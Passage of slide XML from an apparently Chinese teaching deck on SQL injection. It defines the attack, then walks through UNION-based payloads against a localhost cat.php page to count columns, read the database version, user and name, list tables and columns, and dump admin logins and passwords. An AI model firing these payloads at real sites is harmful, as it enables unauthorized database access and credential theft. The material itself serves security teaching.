        <p:spPr>
          <a:xfrm>
            <a:off x="1011895" y="1592019"/>
            <a:ext cx="10266329" cy="4032174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个攻击者通过在查询语句中插入一系列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句来将数据写入到应用程序中，这种方法就可以定义成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>从一个数据库获得未经授权的访问和直接检索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击就其本质而言，它利用的工具是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的语法，针对的是应用程序开发者编程过程中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>当攻击者能够操作数据，往应用程序中插入一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>语句时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>注入攻击就发生了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”。实际上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入是存在于常见的多连接的应用程序中一种漏洞，攻击者通过在应用程序中预先定义好的查询语句结尾加上额外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句元素，欺骗数据库服务器执行非授权的任意查询。这类应用程序一般是网络应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Web Application)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它允许用户输入查询条件，并将查询条件嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求语句中，发送到与该应用程序相关联的数据库服务器中去执行。通过构造一些畸形的输入，攻击者能够操作这种请求语句去获取预先未知的结果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759555" y="5528658"/>
            <a:ext cx="8672887"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>必应词典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> injection]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	 http://www.bing.com/knows/search?q=sql+injection&amp;mkt=zh-cn&amp;FORM=BKACAI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291241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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>②使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BY	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，返回的结果会根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句选择的列进行排序，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后可以是列名，也可以是第几列的数字，如果列数超出现有值，数据库会报错。因此可以通过这个方法可以找到最后一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://localhost/cat.php?id=1%20order%20by%205  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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71" y="3821016"/>
            <a:ext cx="9882230" cy="2694208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25791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smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自带的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>The database version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,@@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>version,3,4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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913149" y="4052815"/>
            <a:ext cx="8192070" cy="1365345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790884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i="1" dirty="0"/>
              <a:t>the current user:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>user(),</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913149" y="4090844"/>
            <a:ext cx="8313334" cy="1845932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189959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dirty="0"/>
              <a:t>the current database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,database(),</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913148" y="4092409"/>
            <a:ext cx="7577071" cy="1817072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356889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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>利用返回的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>meta-information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>构建最终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供关于数据库、表、列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>meta-information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，这些信息储存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库里</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>the list of tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>localhost/cat.php?id=1%20UNION%20SELECT%201,table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t>name,3,4%20FROM%20information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT 1,table_name,3,4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>the list of columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,column_name,3,4%20FROM%20information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411131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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>25</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49" y="2608910"/>
            <a:ext cx="4348311" cy="3536714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="1508341"/>
            <a:ext cx="11094639" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被当前应用程序使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的表名和列名的对应显示： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,concat(table_name,%27:%27,%20column_name),3,4%20FROM%20information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3690544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利用查询语句得到管理员账号与密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用于访问管理页面的用户名和密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,concat(login,%27:%27,password),3,4%20FROM%20users</a:t>
            </a:r>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360" y="4010139"/>
            <a:ext cx="6973792" cy="1737913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
